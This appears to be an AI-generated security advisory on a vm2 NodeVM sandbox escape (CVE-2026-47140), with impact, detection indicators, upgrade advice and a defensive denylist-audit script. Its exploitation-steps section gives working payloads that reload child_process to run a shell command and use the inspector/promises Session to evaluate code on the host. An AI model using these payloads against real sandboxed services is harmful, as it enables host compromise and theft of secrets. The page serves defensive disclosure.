CVE-2026-47140
JavaScript Vulnerability Analysis and Mitigation

Overview

CVE-2026-47140 is a critical sandbox escape vulnerability in vm2, an open-source Node.js VM/sandbox library, titled "NodeVM builtin denylist bypass via process and inspector/promises allows host code execution." The flaw affects all versions of vm2 up to and including 3.11.3, and was patched in version 3.11.4. It was first published by the maintainer on May 18, 2026, and added to the GitHub Advisory Database on May 29, 2026. The vulnerability carries a CVSS v3.1 base score of 10.0 (Critical) (Github Advisory, Feedly).

Technical details

The root cause is an incomplete denylist (CWE-693: Protection Mechanism Failure; CWE-184: Incomplete List of Disallowed Inputs) in lib/builtin.js, where NodeVM's DANGEROUS_BUILTINS set used exact-match logic and omitted two critical Node.js builtins: process and inspector/promises. Because non-denied builtins are exposed to the sandbox via builtins.set(key, special ? special : vm => vm.readonly(hostRequire(key))), sandboxed code can call require('process').getBuiltinModule('child_process') (available in Node.js 22+) to reload any core module regardless of the embedder's allow/deny configuration, or call require('inspector/promises').Session().post('Runtime.evaluate', ...) to evaluate arbitrary JavaScript in the host process. The subpath form inspector/promises did not match the exact-match inspector denylist entry, allowing it to slip through. A proof-of-concept was included in the advisory and tested on vm2 3.11.2 with Node.js v25.9.0 (Github Advisory, Patch Commit).

Impact

Successful exploitation allows an attacker who can execute untrusted JavaScript inside a NodeVM instance to fully escape the sandbox and execute arbitrary code in the host Node.js process. This can result in complete compromise of the application process, including reading and writing arbitrary files, spawning host child processes, accessing environment secrets, and enabling lateral movement within the host environment. The scope change (S:C in CVSS) reflects that the impact extends beyond the sandboxed component to the host system. This vulnerability is only exploitable when the NodeVM configuration allows process, inspector/promises, or the wildcard '*' in require.builtin; the default configuration with require disabled is not affected (Github Advisory).

Exploitation steps

  1. Identify a vulnerable target: Locate an application using vm2 versions ≤ 3.11.3 with a NodeVM configuration that allows process, inspector/promises, or the wildcard '*' in require.builtin (e.g., builtin: ['*', '-child_process', '-inspector']).
  2. Craft a sandbox escape payload using process.getBuiltinModule: Submit untrusted JavaScript to the NodeVM instance that calls require('process').getBuiltinModule('child_process') to reload child_process in the host realm, bypassing the denylist:

       const cp = require('process').getBuiltinModule('child_process');
       module.exports = cp.execFileSync('/bin/sh', ['-c', 'id']).toString();

  3. Alternative: exploit the inspector/promises subpath: Use the Inspector protocol to evaluate arbitrary JavaScript in the host process:

       const { Session } = require('inspector/promises');
       const s = new Session();
       s.connect();
       s.post('Runtime.evaluate', { expression: '/* attacker-controlled host-realm JS */' });

  4. Achieve host code execution: Either method results in arbitrary command execution or JavaScript evaluation in the host Node.js process, with the privileges of the running Node.js service, enabling file access, process spawning, credential theft, or further lateral movement (Github Advisory, Patch Commit).

Indicators of compromise

  • Logs: Node.js application logs showing calls to require('process').getBuiltinModule(...) or require('inspector/promises') originating from sandboxed code; unexpected Runtime.evaluate Inspector protocol calls in debug/trace logs.
  • Process: Unexpected child processes (e.g., /bin/sh, cmd.exe, curl, wget) spawned by the Node.js process running vm2; unusual process trees with the Node.js service as parent.
  • File System: New or modified files in application directories created by the Node.js process; unexpected scripts, web shells, or cron jobs written by the service account.
  • Network: Outbound connections from the Node.js server to unexpected external IPs or domains, potentially indicating reverse shell or data exfiltration activity following sandbox escape.
  • Application Behavior: NodeVM instances accepting user-supplied code that reference process, inspector/promises, or use getBuiltinModule in submitted scripts (Github Advisory).

Mitigation and workarounds

Upgrade vm2 to version 3.11.4 or later, which adds process to the DANGEROUS_BUILTINS set and promotes denylist matching to family-prefix logic via isDangerousBuiltin(key), blocking inspector/promises and all future subpath variants. The fix is enforced at both the BUILTIN_MODULES wildcard expansion path and the addDefaultBuiltin explicit-allowlist path. As an interim workaround, avoid using builtin: ['*'] or any configuration that explicitly allows process or inspector/promises in NodeVM; restrict require.builtin to only the specific modules your application requires. Review all NodeVM configurations for use of the wildcard '*' and audit submitted code for references to these builtins (Github Advisory, vm2 Release).
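To make the exact-match versus family-prefix distinction from the technical details and the fix description concrete, the following is an added illustration written for this page, not vm2's own source. The names DANGEROUS_BUILTINS, isDangerousBuiltin and BUILTIN_MODULES come from the advisory text, but the bodies, the constructed module list and the helper functions exposedBuiltins and auditConfig are assumptions of this example. It expands a NodeVM-style require.builtin list under both matching rules and reports which escape-relevant builtins a configuration would leave exposed:

```javascript
// Added illustration of the denylist logic described in the advisory.
// NOT vm2's source: names follow the advisory text, the implementations are assumptions.
// A constructed subset of Node core module names stands in for BUILTIN_MODULES.
const BUILTIN_MODULES = [
  'fs', 'path', 'child_process', 'process', 'inspector', 'inspector/promises',
  'fs/promises', 'vm', 'worker_threads',
];

// Pre-fix model: exact-match set that omits 'process' (the CWE-184 gap).
const DANGEROUS_BUILTINS_OLD = new Set(['child_process', 'inspector', 'vm', 'worker_threads']);
// Post-fix model: 'process' added, and matching is done per module family.
const DANGEROUS_BUILTINS = new Set(['child_process', 'inspector', 'process', 'vm', 'worker_threads']);

// Exact-match check, as in the vulnerable versions: 'inspector/promises' !== 'inspector'.
function isDangerousBuiltinExact(key) {
  return DANGEROUS_BUILTINS_OLD.has(key);
}

// Family-prefix check: the part before the first '/' decides, so 'inspector/promises'
// (and any future 'inspector/<subpath>') is denied together with 'inspector'.
function isDangerousBuiltin(key) {
  const family = key.split('/')[0];
  return DANGEROUS_BUILTINS.has(family);
}

// Expand a require.builtin list: '*' means every core module, '-name' removes one,
// any other entry allows one; the denylist is then applied to the result.
// Returns the sorted list of builtins the sandbox would actually see.
function exposedBuiltins(builtinConfig, denyFn) {
  const allowed = new Set();
  for (const entry of builtinConfig) {
    if (entry === '*') BUILTIN_MODULES.forEach((m) => allowed.add(m));
    else if (entry.startsWith('-')) allowed.delete(entry.slice(1));
    else allowed.add(entry);
  }
  return [...allowed].filter((m) => !denyFn(m)).sort();
}

// Audit helper: which of the builtins named in the advisory does a config leak
// under a given denylist rule? Empty array means the config is not exposed.
function auditConfig(builtinConfig, denyFn = isDangerousBuiltinExact) {
  return exposedBuiltins(builtinConfig, denyFn)
    .filter((m) => m === 'process' || m.startsWith('inspector'));
}

// The advisory's example config: leaks under exact matching, clean under family matching.
const advisoryConfig = ['*', '-child_process', '-inspector'];
console.log('exact-match exposure :', auditConfig(advisoryConfig));
console.log('family-prefix exposure:', auditConfig(advisoryConfig, isDangerousBuiltin));
```

Running it shows that the wildcard-plus-exclusions config still exposes process and inspector/promises under exact matching, while an explicit list such as ['fs', 'path'] is clean under either rule.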

Community reactions

Heise Online covered the vulnerability as part of a broader report on four critical (CVSS 10.0) security gaps closed in vm2, noting the significance of maximum-severity sandbox escapes in a widely used Node.js library (Heise Online). SecurityOnline.info published a dedicated write-up on the vm2 sandbox escape vulnerabilities, highlighting the RCE risk (SecurityOnline). BeyondMachines.net also flagged the issue as a critical sandbox escape enabling remote code execution (BeyondMachines). Red Hat tracked the issue via Bugzilla, indicating downstream impact assessment for Red Hat products (Red Hat Bugzilla).

Source: This report was generated using artificial intelligence.

